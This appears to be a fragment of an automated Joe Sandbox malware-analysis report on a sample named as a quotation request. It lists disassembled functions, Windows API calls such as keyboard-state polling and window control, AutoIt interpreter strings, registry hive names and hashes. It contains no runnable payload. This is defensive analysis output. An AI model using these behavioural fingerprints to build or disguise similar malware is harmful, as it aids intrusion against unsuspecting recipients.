                                              • __swprintf.LIBCMT ref: 0014A190
                                              • _wprintf.LIBCMT ref: 0014A246
                                              • _wprintf.LIBCMT ref: 0014A264
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                              • API String ID: 311963372-2391861430
                                              • Opcode ID: 727bba06c8fa28d48147110be42af4631218701de0a977716fe412c42f17ad87
                                              • Instruction ID: 77271cdb6d1d19c7a715c14441c6f99ec44b2f4870ea57f9af7bbf192a6c9d51
                                              • Opcode Fuzzy Hash: 727bba06c8fa28d48147110be42af4631218701de0a977716fe412c42f17ad87
                                              • Instruction Fuzzy Hash: F751B031904249AFCF15EBE0CD82EEEB778AF18300F540169F519721A2EB712F49DB61
                                              Function 00145217 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 72sleepwindowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • timeGetTime.WINMM ref: 0014521C
                                                • Part of subcall function 00100719: timeGetTime.WINMM(?,753DB400,000F0FF9), ref: 0010071D
                                              • Sleep.KERNEL32(0000000A), ref: 00145248
                                              • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0014526C
                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0014528E
                                              • SetActiveWindow.USER32 ref: 001452AD
                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001452BB
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 001452DA
                                              • Sleep.KERNEL32(000000FA), ref: 001452E5
                                              • IsWindow.USER32 ref: 001452F1
                                              • EndDialog.USER32(00000000), ref: 00145302
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                              • String ID: @U=u$BUTTON
                                              • API String ID: 1194449130-2582809321
                                              • Opcode ID: e1ae02067363838b37cc0544ad606afce9c79679f8bdb3ba0de9ce961aa85391
                                              • Instruction ID: 6b0c200ecf97750e460eab7cf807863fb200dc05f350e948bd55307177bd5d28
                                              • Opcode Fuzzy Hash: e1ae02067363838b37cc0544ad606afce9c79679f8bdb3ba0de9ce961aa85391
                                              • Instruction Fuzzy Hash: F52181B0208705AFE7016F70FD89F263B6AFB56786F041429F502819B2DBE19DD58A61
                                              Function 000E6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00100B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,000E6C6C,?,00008000), ref: 00100BB7
                                                • Part of subcall function 000E48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000E48A1,?,?,000E37C0,?), ref: 000E48CE
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000E6D0D
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 000E6E5A
                                                • Part of subcall function 000E59CD: _wcscpy.LIBCMT ref: 000E5A05
                                                • Part of subcall function 0010387D: _iswctype.LIBCMT ref: 00103885
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                              • API String ID: 537147316-1018226102
                                              • Opcode ID: 00ff5d90e00a51c856253f4fc36c9e95f290a4e64e2835c4ef6a363e05f71d01
                                              • Instruction ID: 13cfc6f3f183011a5d47f04f41ed53079474b178dc2a720833237265a89a8950
                                              • Opcode Fuzzy Hash: 00ff5d90e00a51c856253f4fc36c9e95f290a4e64e2835c4ef6a363e05f71d01
                                              • Instruction Fuzzy Hash: AC0291301083819FC724EF25C891AAFBBE5BF98354F14492DF4C6A72A2DB71D949CB42
                                              Function 000E45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 000E45F9
                                              • GetMenuItemCount.USER32(001A6890), ref: 0011D7CD
                                              • GetMenuItemCount.USER32(001A6890), ref: 0011D87D
                                              • GetCursorPos.USER32(?), ref: 0011D8C1
                                              • SetForegroundWindow.USER32(00000000), ref: 0011D8CA
                                              • TrackPopupMenuEx.USER32(001A6890,00000000,?,00000000,00000000,00000000), ref: 0011D8DD
                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0011D8E9
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                              • String ID:
                                              • API String ID: 2751501086-0
                                              • Opcode ID: 9294e57d0f9c778039489769a9a530f9db4e4231b81abfdc754392d17f0e844e
                                              • Instruction ID: 6856bea90ddc9b66b8ba5134c5c8b75e52883460fc5001e8823ed708484ee50c
                                              • Opcode Fuzzy Hash: 9294e57d0f9c778039489769a9a530f9db4e4231b81abfdc754392d17f0e844e
                                              • Instruction Fuzzy Hash: 46710670600245BEEB249F15EC89FEABF64FF05368F20022AF515661E1C7B15CA0DB95
                                              Function 001610A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00160038,?,?), ref: 001610BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                              • API String ID: 3964851224-909552448
                                              • Opcode ID: 8ef284cd163cbe1fd6761180c29ed286084f0d05b1494e1fb9c6445ecd7c5d77
                                              • Instruction ID: 11b2e28fb28ceb1cecc09c5d4146a5f7673d033f92cea81e2730c9b7ed04cc96
                                              • Opcode Fuzzy Hash: 8ef284cd163cbe1fd6761180c29ed286084f0d05b1494e1fb9c6445ecd7c5d77
                                              • Instruction Fuzzy Hash: 7941743014824E9BCF15EF90EE916EE3725BF25350F584468FD9167292D770AD2AC760
                                              Function 0016772A Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 101windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 001677CD
                                              • CreateCompatibleDC.GDI32(00000000), ref: 001677D4
                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 001677E7
                                              • SelectObject.GDI32(00000000,00000000), ref: 001677EF
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 001677FA
                                              • DeleteDC.GDI32(00000000), ref: 00167803
                                              • GetWindowLongW.USER32(?,000000EC), ref: 0016780D
                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00167821
                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0016782D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                              • String ID: @U=u$static
                                              • API String ID: 2559357485-3553413495
                                              • Opcode ID: f04e03a8d7ea5eb7d844497a7701a3d60612986014de50e97f8d34f6b9b279cd
                                              • Instruction ID: 79f4527908e633d90d424cff42b5d5355f97581620a6ac7b5207394828515e31
                                              • Opcode Fuzzy Hash: f04e03a8d7ea5eb7d844497a7701a3d60612986014de50e97f8d34f6b9b279cd
                                              • Instruction Fuzzy Hash: 69317C72105215BBDF119FB4EC09FDA3B69FF09365F114228FA15A60E0CB71D8A2DBA4
                                              Function 00145569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                                • Part of subcall function 000E7A84: _memmove.LIBCMT ref: 000E7B0D
                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001455D2
                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 001455E8
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001455F9
                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0014560B
                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0014561C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: SendString$_memmove
                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                              • API String ID: 2279737902-1007645807
                                              • Opcode ID: 5931def90b32599aab3c96d3826bc6aaf58ffa31d0220f35bf6bf8fd33a2965a
                                              • Instruction ID: 76f92b6b64d9e3d1b851bbe68128382105e1b3d3828bfa083970d00da18b04bd
                                              • Opcode Fuzzy Hash: 5931def90b32599aab3c96d3826bc6aaf58ffa31d0220f35bf6bf8fd33a2965a
                                              • Instruction Fuzzy Hash: B81182209541A97EDB24A662CC5ADFFBB7CFF95B00F840469B405A20D3DFA01E09C5E2
                                              Function 001448F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                              • String ID: 0.0.0.0
                                              • API String ID: 208665112-3771769585
                                              • Opcode ID: 957787d3475cef77b99e34045dbf240424a4823a3ca6a977d2774d97c89c2897
                                              • Instruction ID: 2349b93404ac1e112bb48b19f14421299ceec2ba564b040a06bbfc4c980acca0
                                              • Opcode Fuzzy Hash: 957787d3475cef77b99e34045dbf240424a4823a3ca6a977d2774d97c89c2897
                                              • Instruction Fuzzy Hash: 8B110A31908119AFCB24EB24EC4AFDB77BCEF54715F0401BAF484960A1EFF09AC29691
                                              Function 0014D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E9997: __itow.LIBCMT ref: 000E99C2
                                                • Part of subcall function 000E9997: __swprintf.LIBCMT ref: 000E9A0C
                                              • CoInitialize.OLE32(00000000), ref: 0014D855
                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0014D8E8
                                              • SHGetDesktopFolder.SHELL32(?), ref: 0014D8FC
                                              • CoCreateInstance.OLE32(00172D7C,00000000,00000001,0019A89C,?), ref: 0014D948
                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0014D9B7
                                              • CoTaskMemFree.OLE32(?,?), ref: 0014DA0F
                                              • _memset.LIBCMT ref: 0014DA4C
                                              • SHBrowseForFolderW.SHELL32(?), ref: 0014DA88
                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0014DAAB
                                              • CoTaskMemFree.OLE32(00000000), ref: 0014DAB2
                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0014DAE9
                                              • CoUninitialize.OLE32(00000001,00000000), ref: 0014DAEB
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                              • String ID:
                                              • API String ID: 1246142700-0
                                              • Opcode ID: c9bfbd86fe234e81fd33095e1b93ebd4dd1ef9346963cc128ec29c019cebdb5e
                                              • Instruction ID: 24235b1bf890499e4f20aa0324f55a06dcb7f2af14800b9d2f3ef2bf3abb74f5
                                              • Opcode Fuzzy Hash: c9bfbd86fe234e81fd33095e1b93ebd4dd1ef9346963cc128ec29c019cebdb5e
                                              • Instruction Fuzzy Hash: B7B1FB75A00109AFDB04DFA5DC88DAEBBB9FF48314B1484A9F909EB261DB70ED45CB50
                                              Function 0014052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 001405A7
                                              • SetKeyboardState.USER32(?), ref: 00140612
                                              • GetAsyncKeyState.USER32(000000A0), ref: 00140632
                                              • GetKeyState.USER32(000000A0), ref: 00140649
                                              • GetAsyncKeyState.USER32(000000A1), ref: 00140678
                                              • GetKeyState.USER32(000000A1), ref: 00140689
                                              • GetAsyncKeyState.USER32(00000011), ref: 001406B5
                                              • GetKeyState.USER32(00000011), ref: 001406C3
                                              • GetAsyncKeyState.USER32(00000012), ref: 001406EC
                                              • GetKeyState.USER32(00000012), ref: 001406FA
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00140723
                                              • GetKeyState.USER32(0000005B), ref: 00140731
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: 2474afc925c8c442454572d5704e903237c715bf98a09f0786fe824fece2304c
                                              • Instruction ID: b8edb922be98b1141eb0a33f7555ef0e90fac7207db81f34b729aeb45dd772c5
                                              • Opcode Fuzzy Hash: 2474afc925c8c442454572d5704e903237c715bf98a09f0786fe824fece2304c
                                              • Instruction Fuzzy Hash: F2511B60A0478429FB36EBB188547EABFB49F15380F08459DC6C25B5E2DB749B8CCF52
                                              Function 0013C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,00000001), ref: 0013C746
                                              • GetWindowRect.USER32(00000000,?), ref: 0013C758
                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0013C7B6
                                              • GetDlgItem.USER32(?,00000002), ref: 0013C7C1
                                              • GetWindowRect.USER32(00000000,?), ref: 0013C7D3
                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0013C827
                                              • GetDlgItem.USER32(?,000003E9), ref: 0013C835
                                              • GetWindowRect.USER32(00000000,?), ref: 0013C846
                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0013C889
                                              • GetDlgItem.USER32(?,000003EA), ref: 0013C897
                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0013C8B4
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0013C8C1
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$ItemMoveRect$Invalidate
                                              • String ID:
                                              • API String ID: 3096461208-0
                                              • Opcode ID: cb062aace9090e2d9ca86dc1f743d1a7df99bac5af07df5d902fb488b8851346
                                              • Instruction ID: c76c8f1aa39aac9df5f227703d40123103c0fb1d992687b3b58548abc0a02cec
                                              • Opcode Fuzzy Hash: cb062aace9090e2d9ca86dc1f743d1a7df99bac5af07df5d902fb488b8851346
                                              • Instruction Fuzzy Hash: 70514171B00205AFDB18CF69DD89AAEBBB6FB88311F14812DF515E72A0D7B09D41CB50
                                              Function 000E201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000E2036,?,00000000,?,?,?,?,000E16CB,00000000,?), ref: 000E1B9A
                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 000E20D3
                                              • KillTimer.USER32(-00000001,?,?,?,?,000E16CB,00000000,?,?,000E1AE2,?,?), ref: 000E216E
                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0011BEF6
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000E16CB,00000000,?,?,000E1AE2,?,?), ref: 0011BF27
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000E16CB,00000000,?,?,000E1AE2,?,?), ref: 0011BF3E
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000E16CB,00000000,?,?,000E1AE2,?,?), ref: 0011BF5A
                                              • DeleteObject.GDI32(00000000), ref: 0011BF6C
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                              • String ID:
                                              • API String ID: 641708696-0
                                              • Opcode ID: 18d861e367e23e83e9cf21cf990a0f8e13a3ac69f19f5c39057a5cbb4d60e6d5
                                              • Instruction ID: e0966ba07af0286a87fef4def2909050c5c920d91f4beb9e10db92f9036cd69d
                                              • Opcode Fuzzy Hash: 18d861e367e23e83e9cf21cf990a0f8e13a3ac69f19f5c39057a5cbb4d60e6d5
                                              • Instruction Fuzzy Hash: A761A931104791DFCB399F16DD88B6AB7FAFB51312F14852CE152A69A1C7B5A8C2CF80
                                              Function 000E21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E25DB: GetWindowLongW.USER32(?,000000EB), ref: 000E25EC
                                              • GetSysColor.USER32(0000000F), ref: 000E21D3
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ColorLongWindow
                                              • String ID:
                                              • API String ID: 259745315-0
                                              • Opcode ID: 292c651f444a78dc44ff3d0a74734f036cad00c8c558cb96bb778de5bbc4784f
                                              • Instruction ID: 71037f1eba858d638e3234338917b54570dbbf1b14c3da4cd203132058b74ee7
                                              • Opcode Fuzzy Hash: 292c651f444a78dc44ff3d0a74734f036cad00c8c558cb96bb778de5bbc4784f
                                              • Instruction Fuzzy Hash: D441A631144180FFDB255F29EC48BB937A9FB06331F184269FE659A1E2C7718C82DB61
                                              Function 0014AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharLowerBuffW.USER32(?,?,0016F910), ref: 0014AB76
                                              • GetDriveTypeW.KERNEL32(00000061,0019A620,00000061), ref: 0014AC40
                                              • _wcscpy.LIBCMT ref: 0014AC6A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: BuffCharDriveLowerType_wcscpy
                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                              • API String ID: 2820617543-1000479233
                                              • Opcode ID: 900e23fd7b9ba6ba72b608b4d8bb7afdaad734be64e21c77cf2c7d5b253b3323
